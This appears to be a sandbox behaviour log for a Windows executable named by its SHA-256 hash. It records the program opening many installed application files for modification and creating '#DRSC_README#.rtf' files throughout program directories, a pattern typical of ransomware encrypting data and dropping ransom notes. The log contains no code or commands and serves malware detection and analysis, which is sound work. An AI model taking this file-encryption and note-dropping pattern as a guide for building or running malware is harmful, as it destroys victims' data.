DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\check-mark-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\InAppSign.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_editpdf_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\org-openide-filesystems.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\sRGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_selectlist_checkmark_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_comment_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\cldrdata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\export.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\variant.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Microsoft Office 15\ClientX64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_radio_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\blacklisted.certs 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\packager.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\GetSend.mp3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 